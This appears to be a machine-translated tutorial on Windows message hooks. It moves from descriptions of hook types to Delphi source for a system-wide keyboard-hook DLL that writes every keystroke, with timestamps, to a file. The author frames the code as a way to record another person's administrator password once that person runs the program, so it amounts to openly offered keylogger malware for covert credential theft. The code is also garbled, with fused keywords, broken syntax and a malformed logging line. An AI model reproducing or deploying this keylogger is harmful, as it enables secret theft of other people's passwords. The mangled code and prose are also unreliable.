Each program has its own living space. In the Windows system, you can do some operations at any time, you can also trigger a message, the message triggered is divided into three, one is to operate your program interface, onclick, ONMOUSEMOVE, etc., another can use Windows message mechanism to capture some system messages, but if you want to monitor any program at any time, you may choose Hook to achieve, although there are other methods, but have to Acknowledged that hook is a way to solve problems. Windows provides Hook mechanism, defined as A callback function provided by an application that receives certain data before the normal recipient of the data. The hook function can thus examine or modify the data before passing it on. Many Hook of ways to use it Enume some common parameters, these are:
CALLWNDPROC, CALLWNDPROCRET: The WH_CALLWNDPROC and WH_CALLWNDPROCRET hooks enable you to monitor messages sent to window procedures by the SendMessage function Windows calls a WH_CALLWNDPROC hook procedure before passing the message to the receiving window procedure, and calls the WH_CALLWNDPROCRET hook procedure after the window procedure has. Processed The Message. CBT:
Windows calls a WH_CBT hook procedure before activating, creating, destroying, minimizing, maximizing, moving, or sizing a window; before completing a system command; before removing a mouse or keyboard event from the system message queue; before setting the input focus; or before synchronizing with the system message queue. The value the hook procedure returns determines whether Windows allows or prevents one of these operations. The WH_CBT hook is intended primarily for computer-based training (CBT) applications.
KEYBOARD:.. He WH_KEYBOARD hook enables an application to monitor message traffic for WM_KEYDOWN and WM_KEYUP messages about to be returned by the GetMessage or PeekMessage function You can use the WH_KEYBOARD hook to monitor keyboard input posted to a message queue Here's an example (Use Delphi7.0 debugging): If you need to access a person's machine, then that person after running // SB will knock in your machine into his ADMINSITRATOR password, of course, you can also use hacker tools to get His password, but why not try to write a program to record all keyboard operations? First, you need to declare that the hook is different from the general application, which needs to appear as a global DLL, otherwise you cannot capture additional information in your program, (Of course you can use Windows messages, this problem is not discussed here). Write a DLL define what function function setkeyhook: bool; export; function endkeyhook: bool; export; procedure keyhookexit; far; procedure SetMainHandle (Handle: HWND); export; forward; function keyboardhookhandler (icode: integer; wparam: wparam; lparam: lparam): lresult; stdcall; export; procedure EntryPointProc (reason: Integer); const hMapObject: THandle = 0; begin case reason of DLL_PROCESS_ATTACH: begin hMapObject: = CreateFileMapping ($ FFFFFFFF, nil, PAGE_READWRITE, 0, SizeOf (THookRec), '_CBT'); rhookrec: = MapViewOffile (hmapobject, file_map_write, 0, 0, 0);
DLL_PROCESS_DETACH: begin try UnMapViewOfFile (rHookRec); CloseHandle (hMapObject); except end; end; end; end; procedure keyhookexit; far; begin if hNexthookproc <> 0 then endkeyhook; exitproc: = procsaveexit; end; function endkeyhook: bool; export ; begin if hNexthookproc <> 0 then begin unhookwindowshookex (hNexthookproc); hNexthookproc: = 0; messagebeep (0); end; result: = hNexthookproc = 0; MainHandle: = 0; end; function Setkeyhook: bool; export; begin hNexthookproc: = SetWindowsHookEx (WH_KEYBOARD, keyboardhookhandler, hInstance, 0); result: = hNexthookproc <> 0; end; function keyboardhookhandler (icode: integer; wparam: wparam; lparam: lparam): lresult; stdcall; export; var s: Tstringlist; beginif icode <0 then begin result: = CallNextHookEX (hNexthookproc, icode, wparam, lparam); exit; end; if lparam <0 then begin exit; end; s: = TStringlist.Create; if FileExists (afilename) then s.LoadFromFile ( AfileName );
// Save the keyboard characters in the file to the file S.Add ('YYYMMDD HH: NN: SS: ZZ:', NOW) Char (WPARAM)); s.SaveTofile (AfileName); S.Free; Result : = 0; END; DLL's Project file defined below Exports SetKeyhook Index 1, EndKeyHook Index 2, SetMainHandle Index 3;
